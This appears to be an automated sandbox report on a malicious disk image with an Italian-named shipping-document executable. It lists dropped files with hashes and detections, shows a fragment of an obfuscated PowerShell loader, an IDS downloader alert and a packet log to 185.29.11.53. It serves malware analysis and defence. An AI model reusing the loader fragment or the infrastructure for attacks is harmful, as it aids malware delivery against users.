                                        SSDEEP:48:tNyFWSU4xympjgs4RIoU99tlNWR83tVAqVbB0Xjvxs8MXgeRGRXNcWpV6hhjt:tNmLHxvCsIfAXW8rBNB0XjZs8EgiGgW+
                                        MD5:1DDB787A64168EE3263E4D4CD00EB4F2
                                        SHA1:FA2D382FD185D0E11F543B06938ADEAAEC4AFDB8
                                        SHA-256:2699A78A6B6D8357248BB538798FAA7AB5FBBB52F58E67E2791DC361AB1A6490
                                        SHA-512:87B74AFCD2081678DB7012B4DA14EC9B328C3004375265ACBD18DBAAC4199CAF829D01A006B67C042B27430625B202B02CA9C67465D4032B626DF6A8D71DBC5B
                                        Malicious:false
                                        Reputation:low
                                        Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):7168
                                        Entropy (8bit):5.2959870663251625
                                        Encrypted:false
                                        SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                        MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                        SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                        SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                        SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse
                                        • Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                        • Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse
                                        • Filename: Ms63nDrOBa.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                        • Filename: rSCAN31804.exe, Detection: malicious, Browse
                                        • Filename: rSCAN31804.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):748488
                                        Entropy (8bit):7.618269683518012
                                        Encrypted:false
                                        SSDEEP:12288:nfLdembnSidSCwsYk8KSO4nMUBOGmJ9R01jS+VBtyS9TvkXFDsiJjWlWVB0mPH:nfLNnSsms/8K54nsVJ9F+VHtkXF4i7XH
                                        MD5:6C446FD0A3F6D498F5CBD0725CE7F232
                                        SHA1:D814C5F4BC9A61690318BA2ED8EC22D55AF16CCE
                                        SHA-256:8A149E1DED1CCE5485B9783687DD8F94C2F3926EDD17E62A682FE56CC73B1AE4
                                        SHA-512:7A2F40DE4785734831AB45945D2A7C0D610D597DB90AAC644FACA8C0A4F4D35A4D7D0B2C9397C41F8FC993B91D5EE4BDD5D1E870488CE49F11F34ECB3939B746
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 8%
                                        Joe Sandbox View:
                                        • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................P...d...........a..0............................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....d...P...f..................@..@................................................................................................................................................................................................................................................................................................................................................
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):70325
                                        Entropy (8bit):5.158902637069244
                                        Encrypted:false
                                        SSDEEP:1536:7Y7brIQR5wdxbwMj3Li8faaKW0UW9AeKnXhSh04R/ID1d2Xnaah6:8HMQkbwMDlipG/BxfUIhl
                                        MD5:28CAA5C31A5E71EAE249CDDEB36BDC2E
                                        SHA1:0FA31BF12563C08257F3DEF568BBE50F12667418
                                        SHA-256:1248FC3D0506610988E6606216DB30BB9018A411DB91FEBA6F4E2860E98BC967
                                        SHA-512:E866F480B2ECD12324D9B5237B0B0EBFEA13582A8AEB6B1D143BD015C1F5971E4BDF350DBA46EE805696BB0A38422370BB6147F341AF1F8359ECF1BF047B0588
                                        Malicious:false
                                        Preview:$England=$Crispate;<#Skied Beggarly Chalkier Schematical daedaleous Opfinderpris #><#Ddssejlers Cress Suprastigmal #><#Kasketten Palaeornithinae Udstyrsforretningen #><#Ggeblommes Biseriate Fadlsankeret Pensaenes Resurcen #><#Blusteringly Spaltenumrene Parmesanosten #><#nervepatients Skibob Extragalactic Athenaea lykkes #>$Talemaskinen = "sti lne;,phinct`$ Ba,kereexcremelstyloaueRowel ec Hg edetGymnasirMembrano PublikpSfor ikh Unharmy Flau.ts mcgo.aiHealthio PolitilTornensoRverhisgFulmineiDrivgarc reweig=Feriela`$BilagetcCelestioNon nimlDiabetelTwirleduDiscip.s ElemeniOvercenoForraadnSammen.;Bindevvf Ramibiu PedatenRegres c Detentt NeckiniSelvagto gravrsnDokumen SkistvlRDiss,rtePo.yentt.lotricrbebudepaPreapplc Sulfa,tskribleoArtiller Amanues Under Fortovs( lumred`$TyndsliPSlikkero SnildesReval.itsnyltepeWisecrajGumlend2se iepr5Samfund3Rei rig,,videns`$alto.etRSobberaaParoxyslGraferslOestom,erverhi dResoluteBemgdhasChauvinr OpbevaeIn,ramndRechase9Chondr 9T lecom) R,euma Unvenee{,utcaro
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):245776
                                        Entropy (8bit):1.2423947315855175
                                        Encrypted:false
                                        SSDEEP:768:7x19EzEPqdI04IDk5wH/o606sFjlhpHi98oiQErpn6jGW3LSSW1Vn+7xd4R89Z9u:13ujvdGpic/cN2q8+js/5/H
                                        MD5:9F9EC5CB34B99692A4EAC963634A7D82
                                        SHA1:5C1C97F3B00365F6CDB43112D31D7DD3AA050870
                                        SHA-256:7579E3606C789ED66E555D541F14BDA6ECAEA4B2EB7B7BC3A25E7C804B3AB48F
                                        SHA-512:A574404306396B333F64FC16256C093CA1F2B6CF87E5675ED678F00DE3B899FFE4A95CBA4D1113B9C86B8C46549D06D7AB97930955F921CD73AE37D4067B1EB0
                                        Malicious:false
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):452228
                                        Entropy (8bit):1.250842541049128
                                        Encrypted:false
                                        SSDEEP:768:qlmssNPVJP2ri6hEVTp7WLL1GEOCTOemgej7kcwntQz2Y1drtNhgCV+AhB/7/dR+:5tvPloD3bnq3TzwesbDEfLeaz6oSzjU8
                                        MD5:30C2C02FB78EFAA65C6A38457A7DC4F6
                                        SHA1:40AEF6B9982695F88F0515104BFEEACFAF22FEDA
                                        SHA-256:CE57C2DEDAA3A0FD5F5C267F3336F5ACB6109D00D31A98D4638D26A77939CEFC
                                        SHA-512:8AC0B2E7831C801D7C4043195BEFC309F2C79BE719FF0171D0A4E580671EBADD2F737C307A4AAE2E548705CD11B24FE64F07C6E842D7DD5D3CCD88EA677BC7FA
                                        Malicious:false
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):344050
                                        Entropy (8bit):7.580146229974094
                                        Encrypted:false
                                        SSDEEP:6144:9ruXsLmgXj+a9etxVoOztIvtqYNsTOwJOBQ7Uv:9aumgXetHoStettqTOwaQYv
                                        MD5:39486BA352B5221ADE774BCECDE6F4DB
                                        SHA1:1E37B8B97559B16397301136B7B4ABFF7C50E86C
                                        SHA-256:9B9BFB77B758FA9BE7BDDB087F9E0893755B7455BC5AF6DA4E929E0EE3270D8D
                                        SHA-512:1DBA6E25006FA096DD90C7A64097D5F3CFBA857E14D4C32FBC9F4CA04E8E33D744B2C7048B569446024E9CF78577D4240C004BCF7ADE91839D7FAAE1CE864495
                                        Malicious:false
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):328009
                                        Entropy (8bit):1.2551228776153396
                                        Encrypted:false
                                        SSDEEP:1536:AfCPIKQLWsgBwj5eZNb+h+QkSGkJPsGyksKU:ATKZNbTQkSGky0sKU
                                        MD5:78C7002A6C29415CEA767894F99BDF01
                                        SHA1:37B39AF4E61D2A97D1B1AEA54D1C3C3D8C3AD6D8
                                        SHA-256:414BB9BB930F1269088CF9BF027667E6B9A4130E6E719E7C178406A8C8C3183E
                                        SHA-512:A39B5656AF287783AB4C5E211C148D2D233AB635E8D8C4870693D31267904E9C94A3BCC07B20F92C55F68BC7E6E2B5F1D22C6ED3F9B3A729CABD14B2E7B58D58
                                        Malicious:false
                                        Process:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):453
                                        Entropy (8bit):4.241518252490206
                                        Encrypted:false
                                        SSDEEP:6:mTXCFWRbo5FpTNrQNFqqhq48RZ8av8Atp3d6G4bg3pCp+oWKHYAtpcRvFVTZqIMC:0X4OA7aY48MNAtDMeExYAYdfqI1f1o2
                                        MD5:261F38F05E7DE27DA302C07B62E1F94D
                                        SHA1:8D495D43FC7A2B40C52B8D31678F24B519257610
                                        SHA-256:50D950EE2F6CD5D31AAA35B913DC46C8EEE3120B7444EF5EBB302B88851F3328
                                        SHA-512:62106A1D3608A63C12D6E9A7A00FD775ECD38193B779D4C13E18850230F1C7A1F0BD5DF0602AF5553F24BB0BAD6703BB9DC00C09C14E91DD098CE4EC95050E47
                                        Malicious:false
                                        Preview:stulls sprttede trlkvinder materialerne,disciplinerendes antirailwayist topchefs dhyana behovsanalyserne,vager cimnel bonderve debitable karyotin sadelmagervrkstederne samfundskonomien plakatopstning horologe vaner taleruafhaengigt..flimmer carryout arbejdsdisketterne breakaxe vidtaabne elastose.attestationerne mennonist rubicon barogrammerne respectively reddet overretention,brdknivenes yndlingsbog ministate paleogeographically repenalize henriett.
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):302
                                        Entropy (8bit):4.4126027758802335
                                        Encrypted:false
                                        SSDEEP:6:wvMYFVEh1IM6VZ1ErQNwvm/cHg2a9yotVU06X//F:wvMYFVEh156Vwnusg2a9ySVU06XV
                                        MD5:17C99C485FA2A13E5AA1ED2E49D1421E
                                        SHA1:90541F934AFFE8917E470CD02ADD5B6CDE503A2C
                                        SHA-256:208DE1CBAD2444DEF5DDE1A55320E22E7C88EFC1C9D4F9503980BE31029B13CD
                                        SHA-512:E9E411299D06DD3DD6FC66746646292426F383ABBC640D8C8EA70E3D2CAA81B47C7DF90AA6EA224B699D58429494FF654B20101D18B3CB414AB0F95AFC59D566
                                        Malicious:false
                                        Preview:....Attached : True..BlockSize : 0..DevicePath : \\.\CDROM1..FileSize : 1310720..ImagePath : C:\Users\user\Desktop\Ze1Ueabtx5.img..LogicalSectorSize : 2048..Number : 1..Size : 1310720..StorageType : 1..PSComputerName : ........
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):748488
                                        Entropy (8bit):7.618269683518012
                                        Encrypted:false
                                        SSDEEP:12288:nfLdembnSidSCwsYk8KSO4nMUBOGmJ9R01jS+VBtyS9TvkXFDsiJjWlWVB0mPH:nfLNnSsms/8K54nsVJ9F+VHtkXF4i7XH
                                        MD5:6C446FD0A3F6D498F5CBD0725CE7F232
                                        SHA1:D814C5F4BC9A61690318BA2ED8EC22D55AF16CCE
                                        SHA-256:8A149E1DED1CCE5485B9783687DD8F94C2F3926EDD17E62A682FE56CC73B1AE4
                                        SHA-512:7A2F40DE4785734831AB45945D2A7C0D610D597DB90AAC644FACA8C0A4F4D35A4D7D0B2C9397C41F8FC993B91D5EE4BDD5D1E870488CE49F11F34ECB3939B746
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 8%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................P...d...........a..0............................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....d...P...f..................@..@................................................................................................................................................................................................................................................................................................................................................
                                        File type:data
                                        Entropy (8bit):5.097156613356278
                                        TrID:
                                        • ImgBurn Image (2054048/1) 49.88%
                                        • null bytes (2050048/1) 49.78%
                                        • Photoshop Action (5010/6) 0.12%
                                        • Lotus 123 Worksheet (generic) (2007/4) 0.05%
                                        • HSC music composer song (1267/141) 0.03%
                                        File name:Ze1Ueabtx5.img
                                        File size:1'310'720 bytes
                                        MD5:de10bad1ae168cd0c81afb61723464ac
                                        SHA1:a5e93224048e0681278eab54ff273068bbb56289
                                        SHA256:2a8d91f4633e838069bd4d2e4f90cf83327bae4efb9442f23198e40676c55096
                                        SHA512:50b3e0c08e774021f40e4faebf66a48c944ace698043306a39315962a7b7105416e94a293c8ca23beea19fa811e059cea7b811a39f937215ffe130017cf7b7ee
                                        SSDEEP:24576:ifLNnSsms/8K54nsVJ9F+VHtkXF4i7XPP:QkE4YJ9FQkfTPP
                                        TLSH:C65522087FA8E5F1D1D5AB7D09B2839316F0B587165A5F03B214FF1E1D6D2828A0AFB4
                                        File Content Preview:...............................................................................................................................................................................................................................................................
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-25T12:35:49.297316+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49737 | 185.29.11.53 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 12:35:48.688862085 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:48.694401979 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:48.694494009 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:48.694613934 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:48.699476957 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.297199011 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.297240019 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.297278881 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.297312975 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.297316074 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.297343969 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.297368050 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.297379971 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.297394037 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.297415972 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.297425985 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.297455072 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.374283075 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.374325037 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.374363899 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.374401093 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.374408007 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.374418020 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.374464035 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.374464035 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.374499083 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.374510050 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.374532938 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.374545097 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.374568939 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.374578953 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.374614000 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.385452032 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.385487080 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.385524035 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.385524035 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.385544062 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.385564089 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.451088905 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.451131105 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.451164007 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.451167107 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.451179981 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.451200962 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.451209068 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.451237917 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.451246023 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.451280117 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.451441050 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.451473951 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.451489925 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.451513052 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.451518059 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.451554060 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.462764978 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.462820053 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.462836027 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.462855101 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.462869883 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.462888956 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.462897062 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.462935925 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.462940931 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.462989092 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.463135004 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.463177919 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.463186979 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.463223934 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.463232040 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.463264942 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.463275909 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.463310957 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.463318110 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.463361025 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.464023113 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.464059114 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.464077950 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.464093924 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.464104891 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.464149952 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53
Sep 25, 2024 12:35:49.528541088 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.528567076 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.528583050 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.528600931 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.528685093 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.528722048 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.528739929 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
Sep 25, 2024 12:35:49.528758049 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4
